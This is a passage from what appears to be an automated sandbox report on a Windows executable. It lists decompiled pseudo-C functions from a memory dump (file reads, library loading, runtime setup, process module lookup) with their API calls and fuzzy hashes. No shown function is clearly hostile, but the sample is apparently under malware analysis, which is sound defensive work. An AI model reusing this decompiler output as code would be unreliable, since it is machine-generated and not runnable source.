                                                                                                							_t19 = E00440628(_t13, _t11, 1);
                                                                                                							_pop(_t13);
                                                                                                							if(_t19 == 0) {
                                                                                                								L10:
                                                                                                								_t2 = E004414D5(_t19);
                                                                                                								goto L11;
                                                                                                							} else {
                                                                                                								_t10 = 0;
                                                                                                								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
                                                                                                									goto L10;
                                                                                                								} else {
                                                                                                									_push(0);
                                                                                                									_push(_t19);
                                                                                                									E00448F8F();
                                                                                                									E004414D5(0);
                                                                                                									_t20 = _t20 + 0xc;
                                                                                                									_t16 =  &(_t16[1]);
                                                                                                									continue;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						L9:
                                                                                                						return _t3;
                                                                                                						goto L12;
                                                                                                					}
                                                                                                					_t3 = 0;
                                                                                                					goto L9;
                                                                                                				} else {
                                                                                                					return __eax | 0xffffffff;
                                                                                                				}
                                                                                                				L12:
                                                                                                			}












                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 31092063f941bbd179fece980e0009d3b1031cb35a866333853724fabf375944
                                                                                                • Instruction ID: 6867e292330e79d8cb5cf179cb3cb52e1b05183c244f7a69f06961832baa9cdc
                                                                                                • Opcode Fuzzy Hash: 31092063f941bbd179fece980e0009d3b1031cb35a866333853724fabf375944
                                                                                                • Instruction Fuzzy Hash: 5801DFB260A2167EFA201ABA2CC0F2B231DCB853BCF35173BB521552D1EE68CD504128
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E00408BF6(void* __ecx, void* __edx) {
                                                                                                				void* __ebx;
                                                                                                				signed int _t8;
                                                                                                				int _t9;
                                                                                                				long _t14;
                                                                                                				void* _t22;
                                                                                                				void* _t23;
                                                                                                				void* _t24;
                                                                                                				void* _t25;
                                                                                                				void* _t30;
                                                                                                
                                                                                                				_t22 = __edx;
                                                                                                				_t8 =  *0x46e458; // 0x0
                                                                                                				_t9 = _t8 |  *0x46e45c;
                                                                                                				_t24 = __ecx;
                                                                                                				if(_t9 != 0) {
                                                                                                					 *((char*)(__ecx + 0x39)) = 0;
                                                                                                					do {
                                                                                                						_t9 = CreateFileW(E00401EDD(0x46e410), 0x80000000, 7, 0, 3, 0x80, 0);
                                                                                                						_t23 = _t9;
                                                                                                						if(_t23 == 0xffffffff) {
                                                                                                							 *((char*)(_t24 + 0x39)) = 0;
                                                                                                						} else {
                                                                                                							_t14 = GetFileSize(_t23, 0);
                                                                                                							_t30 = 0 -  *0x46e45c; // 0x0
                                                                                                							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x46e458)) {
                                                                                                								 *((char*)(_t24 + 0x39)) = 1;
                                                                                                								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
                                                                                                									E004095C0(0, _t24);
                                                                                                								}
                                                                                                								Sleep(0x2710);
                                                                                                							}
                                                                                                							_t9 = CloseHandle(_t23);
                                                                                                						}
                                                                                                					} while ( *((char*)(_t24 + 0x39)) == 1);
                                                                                                					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
                                                                                                						_t35 =  *0x46c9c4 - 0x31;
                                                                                                						if( *0x46c9c4 == 0x31) {
                                                                                                							E004074B3(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
                                                                                                							return E00408778(_t24);
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				return _t9;
                                                                                                			}













                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408CCD), ref: 00408C2C
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408CCD), ref: 00408C3B
                                                                                                • Sleep.KERNEL32(00002710,?,?,?,00408CCD), ref: 00408C68
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00408CCD), ref: 00408C6F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                                • String ID:
                                                                                                • API String ID: 1958988193-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E004432B9(signed int _a4) {
                                                                                                				signed int _t9;
                                                                                                				void* _t13;
                                                                                                				signed int _t15;
                                                                                                				WCHAR* _t22;
                                                                                                				signed int _t24;
                                                                                                				signed int* _t25;
                                                                                                				void* _t27;
                                                                                                
                                                                                                				_t9 = _a4;
                                                                                                				_t25 = 0x46d658 + _t9 * 4;
                                                                                                				_t24 =  *_t25;
                                                                                                				if(_t24 == 0) {
                                                                                                					_t22 =  *(0x459be8 + _t9 * 4);
                                                                                                					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                                					if(_t27 != 0) {
                                                                                                						L8:
                                                                                                						 *_t25 = _t27;
                                                                                                						if( *_t25 != 0) {
                                                                                                							FreeLibrary(_t27);
                                                                                                						}
                                                                                                						_t13 = _t27;
                                                                                                						L11:
                                                                                                						return _t13;
                                                                                                					}
                                                                                                					_t15 = GetLastError();
                                                                                                					if(_t15 != 0x57) {
                                                                                                						_t27 = 0;
                                                                                                					} else {
                                                                                                						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                                						_t27 = _t15;
                                                                                                					}
                                                                                                					if(_t27 != 0) {
                                                                                                						goto L8;
                                                                                                					} else {
                                                                                                						 *_t25 = _t15 | 0xffffffff;
                                                                                                						_t13 = 0;
                                                                                                						goto L11;
                                                                                                					}
                                                                                                				}
                                                                                                				_t4 = _t24 + 1; // 0x4cc22725
                                                                                                				asm("sbb eax, eax");
                                                                                                				return  ~_t4 & _t24;
                                                                                                			}











                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00443260,?,00000000,00000000,00000000,?,0044358C,00000006,FlsSetValue), ref: 004432EB
                                                                                                • GetLastError.KERNEL32(?,00443260,?,00000000,00000000,00000000,?,0044358C,00000006,FlsSetValue,0045A0D8,0045A0E0,00000000,00000364,?,0044303A), ref: 004432F7
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00443260,?,00000000,00000000,00000000,?,0044358C,00000006,FlsSetValue,0045A0D8,0045A0E0,00000000), ref: 00443305
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 3177248105-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 83%
                                                                                                			E004183CC(WCHAR* __ecx, intOrPtr __edx) {
                                                                                                				intOrPtr _v8;
                                                                                                				long _v12;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				struct _OVERLAPPED* _t13;
                                                                                                				struct _OVERLAPPED* _t15;
                                                                                                				void* _t22;
                                                                                                				long _t25;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_push(__ecx);
                                                                                                				_t15 = 0;
                                                                                                				_v8 = __edx;
                                                                                                				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
                                                                                                				if(_t22 != 0xffffffff) {
                                                                                                					_t25 = GetFileSize(_t22, 0);
                                                                                                					E0040244B(0, _v8, _t22, _t25, 0);
                                                                                                					_v12 = 0;
                                                                                                					if(ReadFile(_t22, E00401F87(_v8), _t25,  &_v12, 0) != 0) {
                                                                                                						_t15 = 1;
                                                                                                					}
                                                                                                					CloseHandle(_t22);
                                                                                                					_t13 = _t15;
                                                                                                				} else {
                                                                                                					_t13 = 0;
                                                                                                				}
                                                                                                				return _t13;
                                                                                                			}












                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183E9
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183FD
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 00418422
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00404211,004604D4), ref: 00418430
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                • String ID:
                                                                                                • API String ID: 3919263394-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 19%
                                                                                                			E00433B91(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t25;
                                                                                                				void* _t27;
                                                                                                				void* _t28;
                                                                                                				void* _t29;
                                                                                                				intOrPtr _t30;
                                                                                                				intOrPtr* _t32;
                                                                                                				void* _t34;
                                                                                                
                                                                                                				_t29 = __edx;
                                                                                                				_t27 = __ebx;
                                                                                                				_t36 = _a28;
                                                                                                				_t30 = _a8;
                                                                                                				if(_a28 != 0) {
                                                                                                					_push(_a28);
                                                                                                					_push(_a24);
                                                                                                					_push(_t30);
                                                                                                					_push(_a4);
                                                                                                					E004341E0(_t36);
                                                                                                					_t34 = _t34 + 0x10;
                                                                                                				}
                                                                                                				_t37 = _a40;
                                                                                                				_push(_a4);
                                                                                                				if(_a40 != 0) {
                                                                                                					_push(_a40);
                                                                                                				} else {
                                                                                                					_push(_t30);
                                                                                                				}
                                                                                                				E0043316B(_t28);
                                                                                                				_t32 = _a32;
                                                                                                				_push( *_t32);
                                                                                                				_push(_a20);
                                                                                                				_push(_a16);
                                                                                                				_push(_t30);
                                                                                                				E004343E2(_t27, _t28, _t29, _t30, _t37);
                                                                                                				_push(0x100);
                                                                                                				_push(_a36);
                                                                                                				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
                                                                                                				_push( *((intOrPtr*)(_a24 + 0xc)));
                                                                                                				_push(_a20);
                                                                                                				_push(_a12);
                                                                                                				_push(_t30);
                                                                                                				_push(_a4);
                                                                                                				_t25 = E0043399B(_t29, _t32, _t37);
                                                                                                				if(_t25 != 0) {
                                                                                                					E00433139(_t25, _t30);
                                                                                                					return _t25;
                                                                                                				}
                                                                                                				return _t25;
                                                                                                			}














                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 00433BA8
                                                                                                  • Part of subcall function 004341E0: ___AdjustPointer.LIBCMT ref: 0043422A
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00433BBF
                                                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00433BD1
                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00433BF5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 2633735394-0
                                                                                                • Opcode ID: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                                                                                                • Instruction ID: e021a9706d5ae18db0acb93d530c62d6d5f9f9de4b9bc2f5b96f038946e5f308
                                                                                                • Opcode Fuzzy Hash: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                                                                                                • Instruction Fuzzy Hash: 88011732000108BBCF125F56CC01EDB7BAAFF4C759F15505AFD1866121D73AEAA1DBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041807D
                                                                                                • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0041809F
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004180AA
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004180B2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$FileModuleNameOpenProcess
                                                                                                • String ID:
                                                                                                • API String ID: 3706008839-0
                                                                                                • Opcode ID: cb4ed2b19b4b1f2a53795112b295101a8e6fdb5ee909fb117afed395b29affc1
                                                                                                • Instruction ID: 2c86ad556935017758f0f014cded1554511469535e69454f0589763b0010a6d7
                                                                                                • Opcode Fuzzy Hash: cb4ed2b19b4b1f2a53795112b295101a8e6fdb5ee909fb117afed395b29affc1
                                                                                                • Instruction Fuzzy Hash: 6AF0E93174031867D620A2655C09FB73ABC87C8B82F10017EFA08D6181EEA8D88546AE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00432B81() {
                                                                                                				void* _t4;
                                                                                                				void* _t8;
                                                                                                
                                                                                                				E00435DC1();
                                                                                                				E00432B15();
                                                                                                				if(E00435EE8() != 0) {
                                                                                                					_t4 = E00435E9A(_t8, __eflags);
                                                                                                					__eflags = _t4;
                                                                                                					if(_t4 != 0) {
                                                                                                						return 1;
                                                                                                					} else {
                                                                                                						E00435F24();
                                                                                                						goto L1;
                                                                                                					}
                                                                                                				} else {
                                                                                                					L1:
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}






                                                                                                APIs
                                                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00432B81
                                                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00432B86
                                                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00432B8B
                                                                                                  • Part of subcall function 00435EE8: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00435EF9
                                                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00432BA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                • String ID:
                                                                                                • API String ID: 1761009282-0
                                                                                                • Opcode ID: 50cb9e1cc312dad3490e76ffbb225425fbe7469f564cf0576c1ee516de2b9699
                                                                                                • Instruction ID: c0a5d602c469063785cd4c9acb075ffdc8e91f54dee3b5385a9ec7aeab68aa75
                                                                                                • Opcode Fuzzy Hash: 50cb9e1cc312dad3490e76ffbb225425fbe7469f564cf0576c1ee516de2b9699
                                                                                                • Instruction Fuzzy Hash: 2FC04C74014F90111C507FB223171AEB3901C6E38DF9034CFE8502B2039A9E250B617F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 0044135D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorHandling__start
                                                                                                • String ID: pow
                                                                                                • API String ID: 3213639722-2276729525
                                                                                                • Opcode ID: 24b87c615846ca568d1b0a20e7a7f57ea621b2eacb17dce27f094279b975220c
                                                                                                • Instruction ID: 935732daf83d2aaaf2e2e23a7076ba3493a7f372a1cdb7d37cdb48f3c6138d84
                                                                                                • Opcode Fuzzy Hash: 24b87c615846ca568d1b0a20e7a7f57ea621b2eacb17dce27f094279b975220c
                                                                                                • Instruction Fuzzy Hash: 04515A61E0860196FB217B54C90137B6BD4EB40B12F304D6BF896467F9EB3C8CD59A8E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 48%
                                                                                                			E00425FBD(char __ecx, intOrPtr __edx) {
                                                                                                				char _v8;
                                                                                                				char _v12;
                                                                                                				char _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				char _v24;
                                                                                                				char _v28;
                                                                                                				intOrPtr* _v32;
                                                                                                				char _t58;
                                                                                                				void* _t63;
                                                                                                				intOrPtr* _t64;
                                                                                                				intOrPtr _t65;
                                                                                                				intOrPtr _t68;
                                                                                                				void* _t69;
                                                                                                				intOrPtr* _t70;
                                                                                                				void* _t74;
                                                                                                				void* _t76;
                                                                                                				void* _t77;
                                                                                                				void* _t78;
                                                                                                				void* _t79;
                                                                                                				void* _t83;
                                                                                                				char _t84;
                                                                                                				intOrPtr* _t86;
                                                                                                				intOrPtr* _t87;
                                                                                                				intOrPtr _t89;
                                                                                                				void* _t90;
                                                                                                				void* _t91;
                                                                                                				void* _t96;
                                                                                                				intOrPtr _t101;
                                                                                                				intOrPtr _t105;
                                                                                                				intOrPtr* _t106;
                                                                                                				intOrPtr* _t107;
                                                                                                				intOrPtr* _t108;
                                                                                                				intOrPtr* _t109;
                                                                                                				void* _t110;
                                                                                                
                                                                                                				_t58 = __ecx;
                                                                                                				_v28 = __ecx;
                                                                                                				_t105 = __edx;
                                                                                                				_v20 = __edx;
                                                                                                				if(__ecx == 0 || __edx == 0) {
                                                                                                					L8:
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					_t108 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                                					if(_t108 == 0) {
                                                                                                						L21:
                                                                                                						_t109 =  *((intOrPtr*)(_t58 + 0x1c));
                                                                                                						if(_t109 == 0) {
                                                                                                							L48:
                                                                                                							return 1;
                                                                                                						}
                                                                                                						_t84 = 0;
                                                                                                						_v16 = 0;
                                                                                                						_v24 = 0;
                                                                                                						_v28 = 0;
                                                                                                						_v8 = 0;
                                                                                                						_v12 = 0;
                                                                                                						do {
                                                                                                							_t63 = ( *(_t109 + 0xc) & 0x000000ff) - 1;
                                                                                                							if(_t63 == 0) {
                                                                                                								_t64 =  *((intOrPtr*)(_t105 + 0x28));
                                                                                                								_v32 = _t64;
                                                                                                								if(_t64 == 0) {
                                                                                                									L38:
                                                                                                									L39:
                                                                                                									_t65 = _v16;
                                                                                                									L40:
                                                                                                									_t89 = _v12;
                                                                                                									goto L41;
                                                                                                								}
                                                                                                								_v24 = 1;
                                                                                                								_t107 = _t64;
                                                                                                								do {
                                                                                                									_push( *((intOrPtr*)(_t109 + 8)));
                                                                                                									_push( *((intOrPtr*)(_t109 + 4)));
                                                                                                									_push( *((intOrPtr*)(_t107 + 8)));
                                                                                                									_t90 = 2;
                                                                                                									_t68 = E00425ED7(_t90,  *((intOrPtr*)(_t107 + 0xc)));
                                                                                                									_t107 =  *_t107;
                                                                                                									_t110 = _t110 + 0xc;
                                                                                                									_v28 = _t68;
                                                                                                								} while (_t107 != 0);
                                                                                                								_t105 = _v20;
                                                                                                								goto L38;
                                                                                                							}
                                                                                                							_t69 = _t63 - 1;
                                                                                                							if(_t69 == 0) {
                                                                                                								_t70 =  *((intOrPtr*)(_t105 + 0x24));
                                                                                                								_v32 = _t70;
                                                                                                								if(_t70 == 0) {
                                                                                                									goto L38;
                                                                                                								}
                                                                                                								_t106 = _t70;
                                                                                                								_t84 = 1;
                                                                                                								do {
                                                                                                									_push( *((intOrPtr*)(_t109 + 8)));
                                                                                                									_push( *((intOrPtr*)(_t109 + 4)));
                                                                                                									_push( *((intOrPtr*)(_t106 + 8)));
                                                                                                									_t91 = 2;
                                                                                                									_t65 = E00425ED7(_t91,  *((intOrPtr*)(_t106 + 0xc)));
                                                                                                									_t106 =  *_t106;
                                                                                                									_t110 = _t110 + 0xc;
                                                                                                									_v16 = _t65;
                                                                                                								} while (_t106 != 0);
                                                                                                								_t105 = _v20;
                                                                                                								_t43 =  &_v8; // 0x427269
                                                                                                								_t101 =  *_t43;
                                                                                                								goto L40;
                                                                                                							}
                                                                                                							if(_t69 != 0) {
                                                                                                								goto L38;
                                                                                                							}
                                                                                                							_t73 =  *((intOrPtr*)(_t105 + 0x334));
                                                                                                							_t101 = 1;
                                                                                                							_v8 = 1;
                                                                                                							if( *((intOrPtr*)(_t105 + 0x334)) == 0) {
                                                                                                								goto L39;
                                                                                                							}
                                                                                                							_t92 =  *((intOrPtr*)(_t109 + 8));
                                                                                                							if( *((intOrPtr*)(_t105 + 0x338)) <  *((intOrPtr*)(_t109 + 8))) {
                                                                                                								goto L39;
                                                                                                							}
                                                                                                							_t74 = E00434641(_t73,  *((intOrPtr*)(_t109 + 4)), _t92);
                                                                                                							_t32 =  &_v8; // 0x427269
                                                                                                							_t101 =  *_t32;
                                                                                                							_t110 = _t110 + 0xc;
                                                                                                							_t65 = _v16;
                                                                                                							if(_t74 != 0) {
                                                                                                								goto L40;
                                                                                                							}
                                                                                                							_t89 = 1;
                                                                                                							_v12 = 1;
                                                                                                							L41:
                                                                                                							_t109 =  *_t109;
                                                                                                						} while (_t109 != 0);
                                                                                                						if(_t84 == 0 || _t65 != 0) {
                                                                                                							if(_v24 == 0 || _v28 != 0) {
                                                                                                								if(_t101 == 0 || _t89 != 0) {
                                                                                                									goto L48;
                                                                                                								} else {
                                                                                                									goto L8;
                                                                                                								}
                                                                                                							} else {
                                                                                                								goto L8;
                                                                                                							}
                                                                                                						} else {
                                                                                                							goto L8;
                                                                                                						}
                                                                                                					} else {
                                                                                                						goto L3;
                                                                                                					}
                                                                                                					do {
                                                                                                						L3:
                                                                                                						_t76 = ( *(_t108 + 0xc) & 0x000000ff) - 1;
                                                                                                						if(_t76 == 0) {
                                                                                                							_t86 =  *((intOrPtr*)(_t105 + 0x28));
                                                                                                							while(_t86 != 0) {
                                                                                                								_t77 = E00425ED7(1,  *((intOrPtr*)(_t86 + 0xc)),  *((intOrPtr*)(_t86 + 8)),  *((intOrPtr*)(_t108 + 4)),  *((intOrPtr*)(_t108 + 8)));
                                                                                                								_t110 = _t110 + 0xc;
                                                                                                								if(_t77 != 0) {
                                                                                                									goto L8;
                                                                                                								}
                                                                                                								_t86 =  *_t86;
                                                                                                							}
                                                                                                							goto L19;
                                                                                                						}
                                                                                                						_t78 = _t76 - 1;
                                                                                                						if(_t78 == 0) {
                                                                                                							_t87 =  *((intOrPtr*)(_t105 + 0x24));
                                                                                                							while(_t87 != 0) {
                                                                                                								_push( *((intOrPtr*)(_t108 + 8)));
                                                                                                								_push( *((intOrPtr*)(_t108 + 4)));
                                                                                                								_push( *((intOrPtr*)(_t87 + 8)));
                                                                                                								_t96 = 2;
                                                                                                								_t79 = E00425ED7(_t96,  *((intOrPtr*)(_t87 + 0xc)));
                                                                                                								_t110 = _t110 + 0xc;
                                                                                                								if(_t79 != 0) {
                                                                                                									goto L8;
                                                                                                								}
                                                                                                								_t87 =  *_t87;
                                                                                                							}
                                                                                                							goto L19;
                                                                                                						}
                                                                                                						if(_t78 != 0) {
                                                                                                							goto L19;
                                                                                                						}
                                                                                                						_t82 =  *((intOrPtr*)(_t108 + 8));
                                                                                                						if( *((intOrPtr*)(_t105 + 0x338)) <  *((intOrPtr*)(_t108 + 8))) {
                                                                                                							goto L19;
                                                                                                						}
                                                                                                						_t83 = E00434641( *((intOrPtr*)(_t105 + 0x334)),  *((intOrPtr*)(_t108 + 4)), _t82);
                                                                                                						_t110 = _t110 + 0xc;
                                                                                                						if(_t83 != 0) {
                                                                                                							goto L19;
                                                                                                						}
                                                                                                						goto L8;
                                                                                                						L19:
                                                                                                						_t108 =  *_t108;
                                                                                                					} while (_t108 != 0);
                                                                                                					_t58 = _v28;
                                                                                                					goto L21;
                                                                                                				}
                                                                                                			}





































                                                                                                0x00000000
                                                                                                0x00426069
                                                                                                0x00426069
                                                                                                0x00000000
                                                                                                0x0042606b
                                                                                                0x00425fec
                                                                                                0x00425fef
                                                                                                0x00426021
                                                                                                0x00426043
                                                                                                0x00426026
                                                                                                0x0042602c
                                                                                                0x0042602f
                                                                                                0x00426034
                                                                                                0x00426035
                                                                                                0x0042603a
                                                                                                0x0042603f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00426041
                                                                                                0x00426041
                                                                                                0x00000000
                                                                                                0x00426047
                                                                                                0x00425ff5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00425ff7
                                                                                                0x00426000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0042600c
                                                                                                0x00426011
                                                                                                0x00426016
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0042606f
                                                                                                0x0042606f
                                                                                                0x00426071
                                                                                                0x00426079
                                                                                                0x00000000
                                                                                                0x00426079

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memcmp
                                                                                                • String ID: irB
                                                                                                • API String ID: 2931989736-1033638517
                                                                                                • Opcode ID: 120f9d004c1eb18e1ea1d1686bb21c584d876b3dcf00480fdd14d99f290d082d
                                                                                                • Instruction ID: e79a622e3f6ac8b7c144f513c2f51a3317a1fa9f6373d75043333cc3042f2629
                                                                                                • Opcode Fuzzy Hash: 120f9d004c1eb18e1ea1d1686bb21c584d876b3dcf00480fdd14d99f290d082d
                                                                                                • Instruction Fuzzy Hash: 9851E535B006229BCB21CF69D981A3BB7B5FF44310B96402ED91897301D735FE10DB88
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E004472E3(signed int _a4, signed short* _a8, char _a12) {
                                                                                                				void _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
